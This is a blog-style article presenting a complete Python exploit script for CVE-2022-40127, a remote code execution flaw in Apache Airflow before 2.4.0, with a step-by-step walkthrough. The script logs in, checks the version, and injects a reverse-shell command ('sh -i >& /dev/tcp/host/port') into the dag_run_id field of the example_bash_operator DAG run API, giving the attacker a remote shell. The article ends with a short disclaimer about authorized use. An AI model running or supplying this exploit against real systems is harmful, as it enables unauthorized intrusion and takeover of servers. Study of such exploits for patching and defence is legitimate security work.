RCE via example DAG in Apache Airflow (CVE-2022–40127) — Exploit

7 min readAug 22, 2023

Summary

The provided Python code is an exploit script targeting CVE-2022–40127, a Remote Code Execution (RCE) vulnerability in Apache Airflow versions before 2.4.0. The vulnerability arises due to insufficient validation of user-supplied inputs, which allows an attacker to execute arbitrary code on the target system

General

1. import argparse
2. import re
3. import requests
4. import json
5. from packaging import version
6.
7. def get_csrf_token(url):
8.    """Get the CSRF token from the login page response"""
9.    response = requests.get(url + "/login/")
10.    pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
11.    csrf_token = re.search(pattern, response.text)
12.    initial_session_cookie = response.cookies.get('session')
13.
14.    if csrf_token:
15.        print("[+] CSRF token found.")
16.        return initial_session_cookie, csrf_token.group(1)
17.    else:
18.        print("[-] CSRF token not found. Exiting...")
19.        exit(1)
20.
21. def login(url, username, password, cookie, csrf_token):
22.    """Login to the Apache Airflow web application"""
23.    response = requests.post(
24.        url + "/login/",
25.        headers={
26.            "Content-Type": "application/x-www-form-urlencoded",
27.            "Cookie": f"session={cookie}"
28.        },
29.        data={"csrf_token": csrf_token, "username": username, "password": password}
30.    )
31.
32.    if "Invalid login. Please try again." in response.text:
33.        print("[+] Login was not successful due to invalid credentials.")
34.        exit(1)
35.
36.    elif response.status_code != 200:
37.        print("[-] Something went wrong with the login process.")
38.
39.    elif "Set-Cookie" in response.headers:
40.        session_cookie = response.headers["Set-Cookie"].split(";")[0].split("=")[1]
41.        print(f"Login was successful. Captured session cookie: {session_cookie}")
42.        return session_cookie
43.
44. def check_airflow_version(url, session_cookie):
45.    """Check the version of Apache Airflow"""
46.    response = requests.get(
47.        url + "/home",
48.        headers={"Cookie": f"session={session_cookie}"}
49.    )
50.
51.    version_str = re.search(r'v(\d+\.\d+\.\d+)', response.text)
52.    if version_str:
53.        print(f"[+] Airflow version found: {version_str.group(1)}")
54.        return version_str.group(1)
55.    else:
56.        print("[-] Airflow version not found.")
57.        exit(1)
58.
59. def check_example_bash_operator_exists(url, session_cookie):
60.    """Check if the example_bash_operator DAG exists in Apache Airflow"""
61.    endpoint = f'{url}/api/v1/dags'
62.    headers = {'Cookie': f'session={session_cookie}'}
63.    response = requests.get(endpoint, headers=headers)
64.    response_data = response.json()
65.
66.    if any(dag["dag_id"] == "example_bash_operator" for dag in response_data['dags']):
67.        return True
68.    
69.    return False
70.
71. def upload_reverse_shell(url, session_cookie, host, port):
72.    """Upload a reverse shell to the Apache Airflow server"""
73.    payload = f'\";sh -i >& /dev/tcp/{host}/{port} 0>&1;\""'
74.    print (f"[+] Using the following payload: {payload}")
75.
76.    data = {"conf": {},"dag_run_id": payload}
77.
78.    headers = {
79.        "accept": "application/json",
80.        "Content-Type": "application/json",
81.        "Cookie": f"session={session_cookie}"
82.    }
83.
84.    response = requests.post(
85.        f"{url}/api/v1/dags/example_bash_operator/dagRuns",
86.        headers=headers,
87.        json=data
88.    )
89.
90.    response_data = response.json()
91.
92.    if response.status_code == 200:
93.        print(f"[+] Exploit seems to work. Wait for a connection on port {port}.")
94.    else:
95.        print("[-] Something is wrong with the exploit. Here is the response data:")
96.        print(response.text)
97.
98. def main():
99.    """Main function to run the exploit script"""
100.    parser = argparse.ArgumentParser(description="Apache Airflow < 2.4.0 DAG example_bash_operator RCE exploit script (CVE-2022-40127).")
101.    parser.add_argument("-u", "--username", required=True, help="Airflow username")
102.    parser.add_argument("-p", "--password", required=True, help="Airflow password")
103.    parser.add_argument("-url", required=True, help="URL of the Apache Airflow host. Use http(s):// prefix.")
104.    parser.add_argument("-s", "--session_cookie", help="Session cookie if you already have it")
105.    parser.add_argument("-a", "--attack", action="store_true", help="Create a reverse shell on the host")
106.    parser.add_argument("-host", "--rev-shell-host", help="Reverse shell IP/host to bind to from Airflow server")
107.    parser.add_argument("-port", "--rev-shell-port", help="Reverse shell port to bind to from Airflow server")
108.
109.    args = parser.parse_args()
110.
111.    # Check if both username and password or session_cookie are provided
112.    if not (args.username and args.password) and not args.session_cookie:
113.        print("[-] Either provide username and password or session cookie.")
114.        exit(1)
115.
116.    # Validate URL schema
117.    url = args.url
118.    if not url.startswith("http://") and not url.startswith("https://"):
119.        print("[-] Invalid URL scheme. It should start with 'http://' or 'https://'.")
120.        exit(1)
121.    url = url.rstrip("/")
122.
123.    # Check if both host and port are provided
124.    if args.attack and not (args.rev_shell_host and args.rev_shell_port):
125.        print("[-] The host ip and port for the reverse shell to bind to also should be provided in attack mode. Exiting...")
126.        exit(1)
127.
128.    # Get the session cookie
129.    if args.session_cookie:
130.        session_cookie = args.session_cookie
131.    else:
132.        initial_session_cookie, csrf_token = get_csrf_token(url)
133.        session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)
134.
135.    airflow_version = check_airflow_version(url, session_cookie)
136.
137.    if version.parse(airflow_version) < version.parse("2.4.0"):
138.        print("[+] Version is vulnerable.")
139.    else:
140.        print("[-] Not vulnerable. Version is above 2.3.4. Exiting...")
141.
142.    if check_example_bash_operator_exists(url, session_cookie):
143.        print("[+] Yay! The example_bash_operator example DAG exists.")
144.    else:
145.        print("[-] No example_bash_operator DAG exists. Exploitation is not possible. Exiting...")
146.        exit(1)
147.
148.    if args.attack:
149.        print("[+] Proceeding with the exploit. Trying to upload reverse shell.")
150.        upload_reverse_shell(url, session_cookie, args.rev_shell_host, args.rev_shell_port)
151.    else:
152.        print("[+] Exploit seems to work. Run the script with \"-a\" option to get a reverse shell.")
153.
154. if __name__ == "__main__":
155.    main()

Description

You can find the script here:

https://github.com/jakabakos/CVE-2022-40127-Airflow-RCE

Proof:

High-Level Overview

The script starts by importing the necessary libraries. It defines several functions to perform various tasks, such as retrieving the CSRF token, logging in to the Apache Airflow web interface, checking the version of Airflow, verifying the existence of a specific example DAG

(example_bash_operator), and finally, uploading a reverse shell payload to

the vulnerable server.

The main function orchestrates the exploit process and is responsible for parsing command-line arguments, checking the validity of the provided parameters, and executing the necessary steps to exploit the vulnerability.

Step-by-Step Overview

The script starts by parsing command-line arguments provided by the user using the argparse module. These arguments include the Airflow username, password, the URL of the Apache Airflow host, session cookie (if available), an attack mode flag (-a), and the reverse shell host and port.
The script checks whether the user provided either a session cookie or both a username and password. If not, it displays an error message and exits.
The script validates the URL schema, ensuring it starts with either “http://” or “https://”. If the URL is invalid, an error message is shown, and the script exits.
If the attack mode is enabled (-a option provided), the script checks if both the reverse shell host and port are provided. If not, it displays an error message and exits.
The get_csrf_token function is used to obtain the CSRF token required for the login process. It sends a GET request to the Airflow login page, extracts the CSRF token from the response, and returns the initial session cookie and CSRF token.
The login function performs the login process by sending a POST request to the login page with the provided username, password, and CSRF token. It captures the session cookie from the response headers upon a successful login.
The check_airflow_version function retrieves the Airflow version by sending a GET request to the Airflow home page and parsing the version string from the response.
The script checks if the Airflow version is vulnerable (i.e., below version 2.4.0) using packaging.version. If the version is not vulnerable, an error message is displayed, and the script exits.
The check_example_bash_operator_exists function checks if the example_bash_operator DAG exists on the target server. It queries the Airflow API for a list of DAGs and searches for the example_bash_operator DAG in the response.
If the example_bash_operator DAG exists, the script proceeds with the exploit; otherwise, it displays an error message and exits.
If the attack mode (-a option) is enabled, the script proceeds to upload a reverse shell payload using the upload_reverse_shell function. The payload is constructed to execute a reverse shell connecting back to the provided host and port.
The reverse shell payload is uploaded to the vulnerable Airflow server by sending a POST request to the Airflow API with the payload embedded in the dag_run_id field of the request.
The script checks the response status code to determine if the exploit was successful. If successful, it prints a message instructing the attacker to wait for a connection on the specified port.
If the exploit fails, an error message along with the response data is displayed.
If the attack mode is not enabled, the script suggests running it with the -a option to perform the reverse shell exploit.

Note that the script should only be used for ethical and legal purposes, such as vulnerability testing on systems with proper authorization. Unauthorized use of this code or attempting to exploit systems without proper permission is illegal and unethical.